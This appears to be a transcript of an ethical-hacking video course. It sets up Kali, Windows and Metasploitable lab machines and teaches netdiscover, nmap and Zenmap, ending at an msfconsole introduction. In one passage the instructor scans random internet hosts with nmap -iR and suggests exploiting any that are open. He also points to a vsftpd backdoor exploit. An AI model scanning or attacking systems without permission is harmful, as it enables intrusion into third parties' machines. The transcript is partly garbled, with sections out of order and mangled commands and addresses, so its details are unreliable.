Installing Kali Linux as a virtual machine. So far we've seen how to install Kali Linux as main operating system, but in this video I will show you how to set up your Kali Linux as a virtual machine. So if you are new in Linux, you can start with creating your own safe environment, and this is to prevent your computer from the issues that could be happen. We are going to use a program called VirtualBox in order to do that. VirtualBox is a software virtualization package that installs on an operating system as an application. Also, VirtualBox allows additional operating system to be installed on it. Let's say one is Kali Linux and the other operating system is Windows, so you don't have to buy another computer in order to test the security in a certain operating system. This video is divided into two main parts. The first part shows you how to install Kali Linux as your main operating system using VirtualBox program, and the second part shows you how to install Kali Linux using a program called VMware Workstation. Both programs are used to run a certain operating system as a virtual machine, but the main difference between VirtualBox and VMware Workstation is that VirtualBox is free while VMware Workstation is paid, but you can download VMware Workstation as a free trial. It gives you 1 month for free. Now let's see how we can do that. First, we are going to install Kali Linux as a virtual machine, and we are going to use VirtualBox program. You can download it from the link in the description, or you can go to virtualbox.org. And for Kali Linux, just go to the link in the description, and you will see VMware image or VirtualBox or Hyper-V. Select VirtualBox and select your processor, whether it's 64-bit or 32-bit. Just click on it and install it. In my case, I have already installed it, and let me first install VirtualBox program on my Windows machine. It's very simple and easy. Next, and next. I'm gonna remove this. Okay, next. Yes, next, install. Okay, so I'm gonna say finish. Let me delete everything from here and delete all files. So what I'm gonna do is after downloading this file, which is Kali Linux VirtualBox image, here is it. I have already downloaded. Double click on it. And I'm gonna say import to import the file that I have downloaded. And this process is going to take some time, so just wait. Okay, so after importing your Kali Linux to your VirtualBox, click on it and go to setting, and then go to system and give it 2 GB of RAMs. I think this is enough to run Kali Linux perfectly. And then go to network and make sure that it's on NAT. Then click on OK and start. Enter. And now Kali Linux will install automatically as a VirtualBox, and you don't have to do anything. Now type the username, which is root, and the password tour, which is TWOR. Then press enter. And now Kali Linux is ready to use. So we learned how to install Kali Linux as a virtual machine using the program VirtualBox. And in the next video, I'm going to show you how to install Kali Linux also as a virtual machine. But instead of using VirtualBox program, we're going to use VMware Workstation program, because in my opinion, it's faster and more function than VirtualBox. After learning how we can install Kali Linux as a virtual machine on our VirtualBox program, in this video I'm going to also explain how to install Kali Linux as a virtual machine, but this time using VMware Workstation program, because in my opinion it's better than VirtualBox because it's function and faster than VirtualBox. So to do that, just go to the link in the description and download the free trial version of VMware Workstation. So select Windows if you have Windows and download the installer file. Then go to Kali Linux website and select Kali Linux VMware image and select if you have 64 or 32-bit. In my case, I have 64-bit. So I have already installed all the files. So here I have my VMware Workstation installer, and I have also my Kali Linux image. So in my case, I have already installed VMware Workstation on my Windows, so I'm not gonna install it again. It's very simple and easy. Just run it and say next, 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 and everything will be okay with you. So as you can see, it's already installed on my Windows machine. So I'm gonna exit from here, and you will see this folder or this file that you have downloaded from Kali Linux website. Just right click on it and extract it. So after extracting Kali Linux, you will get this folder. Just open it and run this file that comes with VMX extension. So double click on it and virtual machine or VMware Workstation will run automatically. And here you don't have to do anything, just power the virtual machine. Let me power it again because I have already another version of Kali Linux or another copy. So I'm gonna say enter. It's very simple. We did that in the previous video. Everything will run automatically and you will be able to use Kali Linux without any issues. And now type the username, which is root, and the password is tour. And as you can see, we have successfully installed Kali Linux as a virtual machine without any issues, and you are ready to use your Kali Linux. Installing Kali Linux 2.0 as ISO file. In this section, we will set up our Kali Linux environment properly. But before we get started, we shall learn what is Kali Linux and who uses this distribution. Kali Linux is a Debian-based Linux distribution aimed at advanced penetration testing and security auditing. Also, Kali contains a large number of useful hacking utilities to make penetration testing much easier. And you can run Kali Linux as a live CD or as a virtual machine, or you can install it as your main operating system. Okay, so in this video, I will install Kali Linux as ISO file in my virtual machine. In your case, if you want to install it as your main operating system, just burn it to, or just burn the ISO file to your flash drive or to your CD, then boot from it and follow the steps that I'm going to explain it. So let's see how we can do that. In order to install Kali Linux as your main operating system, all you have to do, just go to the link that you will see it in the description. Then you will select whether you have 64 or 32-bit. I have 64-bit, so I have downloaded a 64-bit image. Here is it, with ISO extension. In your case, you're gonna burn this file to your USB flash drive or to your CD and boot from it. But in my case right now, I'm gonna run it on my virtual machine. Then you will see the interface and you are gonna follow the steps that I'm gonna explain it. So let me go to my virtual machine and say new virtual machine. Next, I'm gonna select the ISO file that I have installed. Next, it's Linux, and I'm gonna call it Kali Linux. Next, let's go Kali Linux 2, and I'm gonna give it 20 GB for storage because I think this is enough. Next, finish. And I'm gonna edit the specification. I'm gonna give it 4 cores and 2 GB of RAM just to make the process more faster. So after burning Kali Linux on your USB flash drive or to your CD and boot from it, you will see this graphical interface. So you will go to graphical install, and then you will select the language. I will keep it as English. United States. The keyboard is American. Continue. So here you will type the host name. I will keep it as Kali. I'm gonna say continue and leave the domain name empty. And here we'll type the password. So I'm gonna leave it as root. Let me type it. Here is it. And I'm gonna retype the password. So root, and I'm gonna say continue. So here you will configure the clock. I'm gonna leave it as Eastern. And here it's asking you if you want to use the entire disk. And actually it's not going to use the actual entire disk that comes with your PC or with your laptop. It's going to use the 20 gigabyte that we have specified when we was configuring the Linux. So I'm going to say continue. Preparing Windows machine. The last machine we are going to set up is Windows machine, because in the next videos we will run many scenarios against the victim computer, which is our Windows virtual machine. So we are going to download Windows for free from the link in the description. Then we will set up Windows as a virtual machine. So let's see how we can do that. So in order to download Windows, go to the link in the description, then you will get this web page. Here it's asking you to select your virtual machine. You have Windows 7, and you have a lot of version from Windows 7, and you have Windows 8.1, and you have Windows 10. In my case, I'm going to download Windows 10 because it's the latest version. Then I'm going to select the platform. In my case, I'm going to say VMware because it's better than VirtualBox. Then go to download.zip. In my case, I have already downloaded these files. It's only one file. Extracted using 7-zip or WinRAR. It's very simple. Then you will get this folder. Open it and run the file that ends with VMX extension. So let me run it. And now VMware Workstation will run automatically. And let's say power this virtual machine. And now you don't have to do anything. Everything will set up automatically. Just wait and your virtual machine will be ready. So let's wait. So our Windows 10 finished installing, and pay attention that whenever you will boot your Windows 10 machine, it will ask you for the password, and the password is a password, as you can see here. And we are ready to perform the attacks that we are gonna explain it in the next videos against this virtual machine. And here you select your disk partition, just leave it and say continue. And say all files in one partition. This is good, and continue. Okay, finish partitioning and write change to disk. Continue. Write the change to disk. Yes, and continue. And now it's asking us if I want to use a network mirror. I'm gonna say yes and continue. Leave the HTTP proxy information empty and say continue. And now the process almost done. And also now it's asking us if I want to install grab bootloader. I'm gonna say yes, and basically grab bootloader is an interface. Whenever you boot your Kali Linux system, you will see like a graphical interface to boot it. Okay, so now click on continue again. Continue. Now wait a little bit. And now the installation is complete. Just hit continue and Kali Linux will boot automatically. And here it's asking for the username, so type root, and the password is tour. Okay. And as you can see, we were able to install Kali Linux as a virtual machine using VMware Workstation program, and you are ready to use Kali Linux. The last virtual machine we are going to set up is Metasploitable. Metasploitable is an intentionally vulnerable Linux virtual machine, and it can be used to conduct security training and practice common penetration testing techniques. Okay, so first we are going to download Metasploitable from the official website, which is Rapid7. Then we will set it up as a virtual machine. Now let's see how to do that. Okay, so the first thing you are going to be doing is you will go to the official website of Metasploitable, which is Rapid7. Then you are going to fill in your information, first name, last name, etc. Then you're going to submit it and you will download Metasploitable. Or you can go to sourceforge.net, and I'm going to put all the links in the description, and you can download Metasploitable image without having to register in the official website. Then in my case I have already downloaded, which is here. I'm going to extract it on my desktop. Then you are going to be getting this folder, which is Metasploitable. And now I'm going to run VirtualBox. And I'm going to say new. And the type is going to be Linux. And the name, I'm going to call it Metasploitable. Then I'm going to hit continue. And I'm going to leave it as 1 GB of RAM. I think this is enough. And now I'm going to select use an existing virtual hard disk file. I'm going to select the file that I have extracted. It's in the Metasploitable folder. And here the file ends with vmdk extension. Then I'm going to say open and create. So now I'm going to say start. And now it's going to start without having any issues. And now I'm gonna type the username, which is msfadmin, and the password is also msfadmin. And now I am in Metasploitable. If I type fconfig, I'm gonna see my IP address. If I type pwd, I'm gonna see my current directory. Okay, so after installing all of your virtual machine, the first thing you're gonna be doing is you're gonna configure the network setting of the virtual machine, because if you came back to your Kali Linux or Windows or Metasploitable, you'll notice that all of them have the same IP address. So let me come back to my Kali Linux, and I'm going to give you an example. And if I type fconfig, that you will see that it has 10.02.15, and fconfig in Metasploitable, you'll see that it has 10.02.15. Also in Windows, you will see it has 10.02.15. Okay, so to fix this issue, you're going to turn off all of the machines first. And now I'm going to shut down Kali Linux. And then I'm going to come back to the VirtualBox. And I'm going to VirtualBox preferences from up, preferences. Then I'm going to network, and I'm going to add a new network. I'm going to call this network, for example, 10.0.2 NAT, like this. Then I'm going to say OK and OK. Now I'm going to come back, I'm going to select Cal Linux and I'm going to the setting of Cal Linux. Then I'm going to network and I'm going to enable network adapter, and instead of NAT, I'm going to select NAT network, and it's going to be selecting by default to 10.02 NAT that I have created. Then I'm going to click on advanced. I'm going to select allow virtual machines, and this is to send a ping request to each other. Then I'm going to say okay, and the same thing I'm going to do with Windows and Metasploitable. So first I'm going to network, then I'm going to select NAT network, and I'm going to be selecting by default to 10.02 NAT that we have created, and I'm going to select allow via virtual machines and okay. And the same thing with Metasploitable. I'm going to NAT network, advanced, and I'm going to allow virtual machines, and then I'm going to say okay. Now let me run Metasploitable and Windows, and lastly I'm gonna run Cal Linux and see whether this issue has been fixed or not. And now I'm gonna add the username, which is root, and the password tour. And now let me check the IP address. I'm gonna open new terminal and type ifconfig, and you'll see the IP address is 10.02.15. If I checked my Windows machine, I'm gonna see whether it has the same IP address or not. So I'm gonna open CMD, then I'm gonna type ipconfig, and you'll see, let me check again. We should get an IP address. It could take a while. Let me go to Metasploitable first, and until it verified the network. So the password is msf admin, and msf admin, and I'm going to type ifconfig, and you will see that it has 10.026. And now I'm going to come back to my Windows, and you can see that the yellow has been gone from here, and I'm going to type ipconfig, and you'll see that I have 10.024. So Cal Linux has 10.0.2.15 and Windows 10.0.2.4, and Metasploitable has 10.0.2.6. I'm gonna see whether these devices can be interact with each other. So I'm gonna type ping 10.0.2.4, which is the IP address of Windows. Then I'm gonna press enter, and as you can see, we were able to send a ping request to Windows machine. And now we're going to do the same thing with Metasploitable. I'm going to add the IP address of Metasploitable 10.0.2.6, as you can see here. And I'm going to say enter, and you can see here that we are receiving a ping request from Metasploitable. Now I'm going to show you how to connect your Wi-Fi adapter to your Cal Linux virtual machine. But before we do that, I highly recommend using this Wi-Fi adapter because it does work with Linux and it supports injection. So the first one is from TP-Link. It costs about $10, and the model is N150. Don't buy the AC600 because it doesn't work with Linux, and you have to install the drivers, and it's going to be a little bit complicated. And the other one is from Alpha, and I highly recommend this Wi-Fi adapters, and actually I'm using it, and it works with me properly. So I have no issues with this adapter. So now let me show you how to connect your Wi-Fi adapter. Okay, here we go. Just go to the top from here to this bar and go to VM, removable devices, and here we go, Railink 802, and connect. And I think it's connected there now. I'm gonna open a new terminal and check whether it's connected or not. So I'm gonna type iwconfig, and as you can see, it's connected, the LAN 0, and the mode is managed. And now we are ready to go to the other section to learn more about the networks and how we can hack it. Updating Kali Linux 2.0. Before we get started into hacking, first I'm going to show you how to update your Kali Linux resources because this will ensure that you use the latest tools. So we'll start with apt-get update. This command is used to recognize the package index files from their sources. Then we will use this command, which is apt-get upgrade, and this command used to update all the programs and tools that comes with Kali Linux. So let's see how we can do that. Okay, so the first thing we're going to do is go and open a new terminal, then type apt-get update, and this command will update all Kali Linux resources. So that will make sure that you use the latest tools and programs. Then I'm gonna type apt-get upgrade, and this command will update all Kali Linux tools and programs. So this process will take some time. That's depend on your internet connection. And now all the tools and programs that comes with Kali Linux are up to date and you're ready to use Kali Linux. After installing and set up all the virtual machine, the first thing we're going to be doing before we get into gaining access section is we shall gather as much as possible of information of the target operating system. The information gathering is the act of collecting information from various sources through various means. Maybe you're wondering right now what kind of information you need to gather. So here I'm going to tell you that you must gather the operating system that the target is running on, because this will help you to determine your target operating system, whether it is using Linux, Mac OS X, or Windows. And you need to discover the open ports and the installed services on the target operating system, because this will help you to check whether one of the installed services is vulnerable or not, so that you can use a ready exploit from Metasploit framework. And there is a bunch of another information you can gather, and we're going to talk about it in the next lectures. So in this section, I'm going to start with scanning the connected clients that are connected to my network. Then I'm going to show you how you can use Nmap tool that helps you to gather a lot of information for pretty much anything on the internet. And lastly, I'm going to show you how you can use the graphical user interface of Nmap tool, which can be handled more easily than Nmap. And finally, if you faced any issue during the practicing, don't hesitate to ask me in the Q&A section of the course or send me a direct message and I'll be glad to respond. In this lecture, we will learn how to discover the connected clients to our network, and this is by using a tool called NetDiscover. NetDiscover is a network address discovering tool that sends an ARP request and sniffs for replies. It's only showing us a simple information about the devices that are connected to the network, such as their IP and MAC addresses, and sometimes it can detect the manufacturer company of the connected client. Maybe you are wondering right now, what if I want to gather information for a target that is not connected to my network? So here you must get the public IP address of your target, and NetDiscover tool is going to be useless because it only discovers the connected clients. But we're going to talk about this in the next lectures. For now, let's see how to discover the connected clients using NetDiscover. So the first thing I'm going to be doing is I'm going to open a new terminal. And now I'm going to type NetDiscover, which is the name of the tool that we are going to be using, and -H for help. And here we can see that there is many options that we can use, and in our case we're going to use only one option, which is -R for range. Here's it. And we can read here scan a given range instead of auto scan, and then we're going to put our default gateway IP address. Let me say clear to clear the terminal, and the first thing I'm going to be doing is I'm going to type route -N. That's going to show me my default gateway. And if I type enter, you will see that my gateway is 192.168.0.1. And let me type fconfig to see my IP address. You can see that my IP address is 192.168.0.150, and it's connected to this default gateway. So from here we can know that my Kali Linux machine is not connected to the virtual machine network, and it's connected to my main network. And to do that, from the setting, just go from here from the top and go to devices, network setting, and change it from NAT network to bridge the adapter, and then select your Wi-Fi adapter that is connected to your host machine. In my case, it's called EN0 Wi-Fi airport. And okay. So now let's use net discover tool. So I'm gonna type net discover -R for range, and now I'm gonna add my default IP address, or the default gateway of my IP address, which is 192.168.0.1 and /24 to scan all the live hosts from 1 to 254 on the subnet number 0. So all the live hosts on subnet number 0 was shown in this terminal. Now I'm gonna say enter. And we can see here that there is 5 devices. And here's all my connected devices. I'm gonna say Ctrl C. And now let's see the first IP address is 192.168.0.1, which is my default gateway, and it has this MAC address, and it's from this company. And we can see the second IP address. It's ended with 31, and it has this MAC address, and it is a TP-Link Technologies, or the MAC vendor or the manufacturer company is TP-Link, but actually this machine is not a TP-Link device, and it's a Metasploitable machine, and we will learn in the next videos how to scan this IP address using Nmap to get more detailed information. And also we have this IP address, and you can see that it's linked out that the manufacturer company is Apple, and actually it's my MacBook, and the second device is my iPhone, and here is my Windows as well. It's connected to the internet through TP-Link Wi-Fi adapter. So here is all the information. We can see all the IP addresses, or all the IP addresses that are connected to our network and their MAC addresses, and also we can see the manufacturer company. Sometimes it's correct and sometimes it's not, but in the next videos we will see more detailed information, and this is by using Nmap tool. After discovering the connected clients on your network, now it's time to scan it using a tool called Nmap. Nmap is a network discovery tool that can be used to get detailed information about any client or network or any target on the internet. Nmap able to scan almost everything connected to the internet. It can detect the open ports of the live host and the running services, and even the version of the running services, and much more. There are tons of options that you can use with Nmap, but I'm not going through all of them because this needs a complete course to explain what is Nmap and how to use it like professionals. So this video could be divided to 2 parts, and I'm going to explain the most commonly useful command that you can use with Nmap. Now let's see how to use Nmap. Okay, so to use Nmap, I'm going to open new terminal, and I'm going to type Nmap -H to see the help menu. So you can see here that there is tons of options that you can use, but I'm not going through all of these options because this needs a complete course in order to explain all of these options. But I'm going to explain only the most popular options, or the options that you need in order to achieve your goal. So I'm going to say clear. Let me minimize the window, and I'm going to say Nmap -V to see the version of Nmap. And you can see here the Nmap version is 7.40, which is the newest version of Nmap. So I'm going to say clear again, and now I'm going to use the command Nmap and then the default gateway of my router, which is 192.168.0.1, and now I'm going to add 24, or let me just scan it right now, like this, just to see the open ports and the services. And you can see here that we have this IP address, and it has this MAC address, and we can see here the port is 53 TCP is open, so the state is open, and the service is domain, and we have also the 80 TCP, and the state is open. So sometimes you will see the state is open or closed or filtered. So filtered means that Nmap cannot determine whether the service or the state is open or not, or the port is open or not, because there is a firewall prevent Nmap from scanning the host. And also we have the port 5000 TCP open, and the service is UPnP. So now we'll go to the second command, which is Nmap 192.168.0.1, but I'm gonna add /24 to scan all the live hosts to see their IP addresses, MAC addresses, and their open ports, and the protocol, whether it's TCP or UDP, and yeah, and the services. So now I'm gonna say enter, and this process could take some time. And here is the result, and you can see here that it took about 53 seconds. And let me maximize the window. And yeah, here we have our default IP addresses, and we explained all of these ports. So the port 53 is open, and the service domain. And here we have another live host on the network, which is 192.168.0.3.1, and it's my Metasploit build machine. And you can see here that there is a lot of open ports, and the state is open, and you can see their MAC addresses and the services. And you can realize here, or you can see here, that there is a service or unknown service here on port 81 or 8180, and you can see that it's connected through the Wi-Fi adapter TP-Link technology. And also we have another machine, which is my MacBook. There is only one port is open, which is 80 on the service HTTP, and you can see its MAC address, and the manufacturer company is Apple. And we have also my Windows machine. There is only one IP address, or one port is open, which is 80 on HTTP server or service. And also we have the MAC address and the Wi-Fi adapter that's connected through it. And yeah, so here's all the 5 hosts. You can see here there is only 5 hosts are up. Let me minimize the window. I'm gonna say clear. So we have another command that allows you to scan multi IP addresses by typing nmap 192. So you can type the first IP address, which is 192.168.0.1, just for example, and now you can type the second IP address, 192.168.0. Let's say 31, which is my Metasploit IP address. So nmap is the name of the tool, and the first IP address and the second IP address. So it's gonna scan only these 2 IP addresses, and I'm gonna say enter. And we can see here the result. So as you can see, it only scanned these two IP addresses. Here is my first IP address, 192.168.0.1, and here is the second IP address, which is 192.168.0.3.1. And here's all the open ports and the services. And you can see here 2 hosts are up, and it scanned in 2 seconds or 2.5 seconds. So let me say clear. So this command is a little bit long, so we can use another command that could be shorter than this command. So we can type nmap, and also this command is used to scan multiple IP addresses. So we can type nmap 192.168.0.1, but instead of typing right now the second IP address or the full second IP address, we can just hit comma and then the IP address of the second machine. So it ends with 31. So instead of typing the full IP addresses, and because these IP addresses are on the same subnet, so you don't have to type the full IP address, just you can type comma 31 to scan these IP addresses. So it's gonna scan 192.168.0.1 and 192.168.0.3.1. And I'm gonna say enter. And as you can see, it scanned these 2 IP addresses. Here is all the open services and ports, and you can see here the open ports, and you can see the services. Let me type clear again, and we can use another command that is going to scan a range of IP addresses. So by typing nmap 192.168.0.1, and now we can say minus 150. So it's gonna scan the IP addresses between range 1 to 150. So I'm gonna say enter. So here you can see that we were able to scan a range of IP addresses. So we have scanned from 1 to 150, and we can see here all the scanned hosts. So here we have 192.168.0.1 and 192.168.0.3.1, and also we have 192.168.0.5.2, which is my Apple device. And yeah, so we have also another command that we can use. Let me say clear first, and it's the status of the scan. So we can type nmap, for example, 192.168.0.1/24 to scan all the hosts on the subnet. And we can type status. So if you are bored and you want to see the status of the scan, because sometimes it takes a long time, you can type state /every, and you can type, for example, 2s or 3s for second. So you want to see the status after 3 seconds, or you can say 3m for minute, or 3h for hour. In my case, I'm gonna say, let's say, for example, 2s for 2 seconds. So if I press enter, you will see the status of the scan. You can see here that it's 83% completed. This is the current one, 41.888, 4197, etc. And then it's gonna scan all the live hosts. So also we have another command, which is the fast scan. So if I type 192, or not, nmap, let me say nmap. Now let's say this, I'm gonna scan my Metasploitable machine, 192.168, now 031, minus capital F for fast, and I'm gonna say enter. But before we do that, let me remove the -F to see the normal scan. And you can see here that it took about 1 second and 80 milliseconds. And if I typed -F, it has to be faster, so 0.42. So this scan is faster. But of course, sometimes it's not going to give you the full details of these hosts, so I recommend using the normal scan. And there is another command that could be used for nasty purposes, which is nmap -I R. So this command is used to scan random targets on the internet. So you can scan for random IP addresses on the internet, and if there is one of these IP addresses has a lot of open ports, or one open port that allows you to hack that machine using a certain exploit in Metasploitable, so you can do it. So let me give you an example. So you can type nmap -I R, and you want to scan for 3 hosts on the internet, and I'm going to say enter. And as you can see here, we were able to scan 3 public IP addresses on the internet, and they are random. And as you can see, we were able to scan for 3 random IP addresses on the internet, but none of these IP addresses is vulnerable because the firewall prevents nmap from scanning for the open ports. You can see here that nmap scanned for 1000 port, and all of them are filtered, so that means that the firewall prevents nmap from scanning for the open ports on this IP address. So here's the first host, and here's the second host, and here's the third host. So the last command I'm going to be using it is -IL. So I'm going to say nmap -I L. So this command is used to scan a list of IP addresses, or a file of IP addresses. Let me say cd desktop, just for example, and now I'm going to create a new file. I'm going to say, for example, targets.txt, and now I'm going to type in this txt file my targets. So you could have for example, 200 targets, or 5 targets, 100 targets, so it doesn't matter, but you're going to scan the list of IP addresses that are in this txt file. So let me say that I'm going to scan 192.168.0.1, and I'm going to scan 192.168.0.220, and 192.168.0.31, and I'm going to say Ctrl-O to save it, and Ctrl-X to exit, and I'm going to say clear again, and I'm going to use nmap -I L to scan a list of IP addresses. And now I'm going to add the txt file, which is targets.txt, and I'm going to say enter, and now it's going to scan all the IP addresses that are in this txt file. And as you can see, we were able to scan the IP addresses. So here you can see our first host, which is 192.168.0.1, and here is all the open ports. And here is our second host, 192.168.0.220, and here is all the services and the ports. And last host is 192.168.0.3.1, and here is all the open ports and the services. So in this lecture, we learned how we can scan for the live hosts that are connected to our network. We see the open ports and the surfaces and their MAC addresses and their IP addresses. And also we learned how to scan multiple IP addresses and how to scan a range of IP addresses and how we can scan a random IP addresses. And also we can scan a list of IP addresses that are in a TXT file. And in the next lecture, I'm going to show you another option that you can use it with Nmap in order to achieve your goal. Okay, so now let's continue using Nmap. I'm going to start with this command, which is nmap -s_v, and this command will scan the version of the installed services on the target operating system. So I'm going to add my target IP address, which is 192.168.0.31, and this is my Metasploitable machine, and I'm going to hit enter. And now the scan is finished, and we can see the versions of the installed services. So here we have a lot of open ports, and we have, for example, HTTP and the version of the HTTP server, which is Apache 2.2.8. And this command is very useful because sometimes the versions of the installed services could be old, and you can use a certain exploit for a certain old version in order to exploit in order to compromise the machine. So I'm going to give you an example. We can copy the first service or the version of the service, which is for FTP, and we can open our browser, and then we can paste the version of the service and say after it exploit. So it's gonna search for an exploit for this version, and here we can see that you can use this exploit /unix/ftp /vsftp the 234 backdoor, and you can exploit this machine remotely, so you don't have to send a certain payload, etc. So now I'm going to show you another command, which is a very useful command, which is nmap -st. So this will scan all the TCP ports on the target machine, and I'm going to add my target machine. I'm going to add the same target, 0.31, and you can see here we have all the TCP ports are open because we have specified the scan to scan for TCP ports. And also there is another command that used to scan the UDP ports. So I'm going to say nmap -su, and now I'm going to say the IP address of my target. Let's say this time 248, which is the IP address of my Windows machine, and I'm gonna hit enter, and it could take some time. And here we can see that all the UDP ports on my target machine, which is Windows, are filtered. So that means that the firewall prevents Nmap from scanning the open ports. So Nmap cannot determine whether the ports are open or not. Let's do the same scan, but instead of our Linux machine, I'm going to scan my Metasploitable machine, and I'm gonna say enter. So I'm gonna cancel this process because it took about 20 minutes and it didn't finish yet. And I'm gonna use the same command, but I'm gonna add the option F that we learned before that will make the process faster. And I'm gonna add the option states -every to show me the state of the scan. So nmap -su to scan for UDP ports, open UDP ports, and then my target IP address, and -F for fast to scan faster, minus states every 2 seconds. It's gonna give me the state of the scan every 2 seconds, and I'm gonna hit enter, and now I can see the states of the scan. Okay, so the scan has been finished, and we can see here that we have about 8 ports are open, UDP ports, and you can see here the service of these ports. And of course, if you want to know the version of these services, you can add the option -S_V, but we have explained this option and I'm not going to be repeated. So let's learn another option. I'm gonna add nmap -O, and I'm gonna add the target IP address. So what this option does is it will check the operating system of the target IP address. So let's say nmap -O 192.168.0.31, which is my Metasploitable IP address, and now I'm gonna press enter. Okay, so now here we can see the device type general purpose running Linux 2.6x. So You can see here operating system details that it could be Linux 2.69 or 2.633, and here you can see the kernel is 2.6. Let's repeat this command, but with my Windows machine IP address. Okay, so here you can see that there is a warning say operating system scan result may be unreliable. So after scanning my Windows machine, you can see here that we have free PSD, that 93% is a free PSD software, and we have here 89% Microsoft Windows 2008, and actually my Windows is Windows 10. So you can check here the operating system. So here it told us that it's a free PSD, and actually it's a Windows 10 machine, and it's not a Windows 2008. So, and as I said before, not always the scan is correct, but sometimes you can add another option, which is -OS scan -guess. So this will guess the operating system of your target, because sometimes it's not going to show you the possible operating system. So these options could help you. You can add -OS scan, -guess, and you can repeat the scan. So here we can see another result, which is the free PSD right now is 95%, and the Microsoft Windows, it could be Windows 2008 or Windows 10, and actually our Windows is Windows 10 and it has 91%. Okay, so there is another command that I'm going to show you, which is nmap -p to scan for ports if you want to scan for a specific port. So let's say that you are trying to scan port 80. Then you are going to put the IP address of your target. So as you can see, we were able to scan only port 80 without having to scan all the open ports. And also we can scan a multiple IP address by using the same command, but after the port. Let's say, for example, here we have 80. I'm going to say comma, and I'm going to add another port, which is 443. And let's say, for example, I'm going to add 21. And now I'm going to press enter, and you can see here that we have 3 ports are scanned. We have 443 is closed, and 80 is open, and 21 is open. And also there is another command that's used to scan also a specific port. So I'm going to say nmap -p, but instead of putting the port number, I'm going to add the service name. So let me say that I'm going to scan for HTTPS service. And now I'm going to add the IP address of my Linux machine. And you can see here that the service HTTPS is closed. And also I can scan a multiple services by adding a comma. Let's say I'm going to scan HTTP and HTTPS. And we can see here that we have 2 HTTP services. One is on port 8008 and one is on port 80. So we learned from this lecture and from the previous lecture how we can use nmap, and we learned the most useful command that you can use it with nmap in order to achieve your goal. And in the next video I'm going to show you the graphical user interface of nmap, which is ZenMap, that will help you to achieve or to perform a very sophisticated scan using only a graphical user interface and without using or typing any command. Now we will use ZenMap tool, which is the interface of nmap. ZenMap is the official nmap security scanner GUI, and it's a multi-platform such as Linux, Windows, and Mac OS. ZenMap is easy for beginners to use while providing advanced features for experienced nmap users. It provides a graphical interface, makes it much easier than nmap because you don't have to type any command. ZenMap allows you to get as much as possible information about your target that helps you a lot in the penetration testing process. And I'm going to explain 3 types of scan. We have ping scan, which is very quick and it only detects a simple information about your target. And we have a quick scan, and this scan detects more details such as the MAC address and the open ports. And the last scan is quick scan plus, and it detects the operating system of the target machine, and it can detect the open ports and the running services and even the version of the running services. Okay, so to run ZenMap, you can open your terminal and you can type here ZenMap. And now it's gonna run, or you can go to the application bar from here, and then you can select information gathering and click on ZenMap icon from here. So here we have the target. You are gonna put the IP address of your target, and here you will see the command that will be executed in the terminal, or the nmap command. And we have here types of scan. We have instance scan, and we have the UDP scan and TCP scan, and we learned how to scan the UDP ports and the TCP ports. And also we have the ping scan, quick scan plus. I'm just going through these three scans, which is ping scan and quick scan plus. I'm gonna start with ping scan, and here's the command that will be executed. You can learn this command and type it in the terminal instead of using a GUI. And here I'm gonna type the IP address of my target. So I'm gonna say 192.168.0.3.1, and now I'm gonna hit scan. And now the scan has been finished, and you can see here that it was very quick, 0.22 millisecond, and the host is up, and you can see its MAC address here. The manufacturer company of this MAC address is TP-Link Technologies. And we can go to the ports and host. You can see here that there is no ports are open because our scan is only a ping scan. And you can see here a topology of the scan. You can click on fisheye and the controls, and you can control from here, so you can zoom and ring gap, etc. So you can manipulate with this controls. And also you have the host details from here. You can see the state of this machine is up, and the filtered ports and the open ports we have 000 because our scan is only a ping scan. And you can see its IP address and its MAC address. And if we go to scans from here, you can see the recently used scans, or the recently scans. So yeah, here we have also the services, or the services that has been scanned, and we have no services because we didn't perform a port scan. So now I'm going to be using a quick scan. So this will scan the ports. So here you will see the command that will be executed, and here's the target IP address, and we will perform a quick scan. So let's say scan. So as you can see, now we have more detailed information. We can see here the open ports, and the protocol is TCP, and the state is open, and the service is FTP, etc. And if you go to services right here, you will see the services that's installed on the target machine. We have all of these services. And let me go to topology, and here you see more detailed information. And if you go to the host details, we can see that the state is up, and the open ports are 18, and we have no filtered ports, and the closed ports are 81, and all the scanned ports. And we have here the addresses and very simple information here. So right now, let me perform a quick scan plus. So this will give me a more detailed information, and it's gonna give me the version of the installed services. So let me say scan. And as you can see, here we have more detailed information. So we have the running operating system is Linux 2.6 and X. And also we have the kernel of this Linux machine, and we can see here that the host is a Metasploitable local domain, and it's a Linux Unix. And we can see here that the version of the installed services. So this is very useful, as we saw in the previous video. And the ports and the topology. And here we have the host details. Let me select my target from here. So we can see here the uptime as well. And we can see here that the accuracy is 100% a Linux machine. It could be Linux 2.6.9 to 2.6 to dot or 0.33. And the port are the used ports, or those ports. And the operating system, you can see it's a Linux family 2.6.x. So we learned from this lecture and from the previous lecture how we can gather as much as possible of information about the target machine, and this is by getting or detecting the operating system of the target machine, whether it's a Metasploitable or a Linux or Windows, etc. And we learned also how we can scan for the open ports, whether it's a TCP ports or UDP ports, and also we learned how we can scan a specific ports or a multiple IP addresses or a multiple ports at the same time. In this section, we will learn what is Metasploit and how to deal with Metasploit by using MSF console interface. Then I'll show you the most useful commands in MSF console that will help you to deal with Metasploit in order to achieve your goal. So for now, Metasploit is the framework that we are going to use in order to hack Windows operating system. After that, I'm going to show you how to create a payload using MSF Venom first. Then we are going to test out the payload that we have created in the target computer. So for now, our payload is not going to be encrypted. We will only test it out in the target computer in order to see the result. Then we will listen for the incoming connection in order to get reverse connection from the target computer, and I will explain how to do it in your internal network and how to get a reverse connection out of your network as well. All the things that I'm going to explain it works against any Windows version, and if you have any question about any lecture, please post it in question and answer section in this course, or send me a message and I'll be glad to respond. In this video, I'm going to talk about Metasploit concept, and I'll show you how to deal with Metasploit using MSF console interface. Metasploit is an open source written in Ruby by Rapid7 company, and it's designed for developing and executing exploit code against a remote target machine. And also, Metasploit contains a large number of ready exploits and payloads against almost any operating system, whether it's Linux, Windows, Mac OS X, or any other operating system. Metasploit is the most popular penetration framework, and it contains many tools, allows you to perform various tasks. And it has many interfaces such as Armitage, MSF console, and web interface. So first, I'm going to show you the steps that you need to do before running Metasploit and how to deal with Metasploit framework using MSF console interface, and the most useful commands that will help you to deal with Metasploit in order to achieve your goal. So let's see how we can do that. So in order to run Metasploit, you need to initialize Metasploit database, and you can use one of these commands. The first command is going to be service Postgres start. So this will initialize a Metasploit database, or you can use msfdb init like this, and this will also initialize Metasploit database. So, but if you type msfdb -h, you can see that you can initialize Metasploit database, or you can reinitialize it, delete it, start it, or stop it. So for now, we've seen how we can initialize Metasploit database, and right now I'm going to use MSF console interface to deal with Metasploit. So I'm going to type MSF console, and I'm going to wait a little bit. So one 